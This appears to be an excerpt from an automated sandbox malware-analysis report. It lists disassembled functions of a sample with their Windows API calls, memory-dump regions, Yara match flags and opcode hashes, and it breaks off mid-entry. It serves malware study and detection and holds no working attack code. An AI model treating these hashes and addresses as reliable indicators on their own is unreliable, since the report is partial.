                                                                                                                                                                                                                                                                          Function 024C6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024C6F21,?,?,00000008,?,?,024CF3E2,00000000), ref: 024C7153
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction ID: 14ef7885017bb4ceecc72a04d284f4eca1241b39c27560258c8e6703b9305fb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFB127392106089FD755CF2CC48AB65BBA4FB45368F29865DE89ACF3A1C735D982CF40
                                                                                                                                                                                                                                                                          Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                          • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                                                          Function 024CB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                          • Instruction ID: 80cf140e91eb6a6325efdfb889abfd38af81fc0c9933d2cf9e9882f1444081a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD21B03A95420AABDF689E2DDC42BBA77ACEB04318F20017FED01D6250EB759944CB50
                                                                                                                                                                                                                                                                          Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                          • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                                                          Function 024CB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024C0A1C,?,024CBC89,00000000,?,?,?), ref: 024CB5A6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                          • Instruction ID: 90f12ea98e8d04160b3d421ad7a2fa3c11264305ff5f77461d81fa701db64628
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D11C63A2007055FDB189F3DC89267ABB92FF8475CB25442DD94687740D771A542CB40
                                                                                                                                                                                                                                                                          Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 787680540-0
                                                                                                                                                                                                                                                                          • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                          • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                                                          Function 024CBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024CB87A,00000000,00000000,?), ref: 024CBB08
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 787680540-0
                                                                                                                                                                                                                                                                          • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                          • Instruction ID: 1115fa2ab215e34a2e4971d1695d130c9bdf8dd89431bb16d99b8b0971c6c7d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F0F93AA001166BDB689A29CC46BBB7768EF4071CF24046EDD05A3644FB70BE42CAD0
                                                                                                                                                                                                                                                                          Function 024CB8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                          • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                          • Instruction ID: ffef62fb7703a98d6accad780bcbb6860a26bbd15c394bcd3c75001c5ce1da19
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D014936B511049BCB18EF38DD41ABA33A9DF04315F1441BFEE02DB281DAB55D048B50
                                                                                                                                                                                                                                                                          Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                          • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                                                          Function 024CB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024C0A1C,?,024CBC4D,024C0A1C,?,?,?,?,?,024C0A1C,?,?), ref: 024CB61B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                          • Instruction ID: 36ea6ead7d9f71a99500d584cce1c5411a3792ed85fcf48559a88f30f12426a4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0C23A300B055FDB246F3DDC82B7A7B95EF8076CF25442EFA458B650D7B198028A44
                                                                                                                                                                                                                                                                          Function 024C5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024C047A,?,00000004), ref: 024C547A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                          • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                          • Instruction ID: dca8ab5af1adc2672d4bbfe0e8776cca0df0ae969c2942eae3b04f6a0a4553e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BF0F635680318BBDB016F55CC01F6E7B26EF04B12F50411EFC05B6290DA719920AA99
                                                                                                                                                                                                                                                                          Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                          • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                          • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                                                          Function 024C5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024BE654: RtlEnterCriticalSection.NTDLL(02040DAF), ref: 024BE663
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024C506C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                          • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                          • Instruction ID: a848064e3ab137f7a738fd8805346c89e514351159180fc2dde1a190d98b60a3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5F08732A20304DFEB10EF69D801B8C77E1AF15B21F10426AF904DB2A1CB7999448F4A
                                                                                                                                                                                                                                                                          Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                          • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                                                          Function 024CB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024CBCAB,024C0A1C,?,?,?,?,?,024C0A1C,?,?,?), ref: 024CB520
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                          • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                          • Instruction ID: 0a90576f449ca22c4736491b66ea8d76071c4f71ddde581c8858cd95582c32da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F0553A30020857CB089F3ADC0576BBF94EFC1764B2A005EEF098B390C7719842C790
                                                                                                                                                                                                                                                                          Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
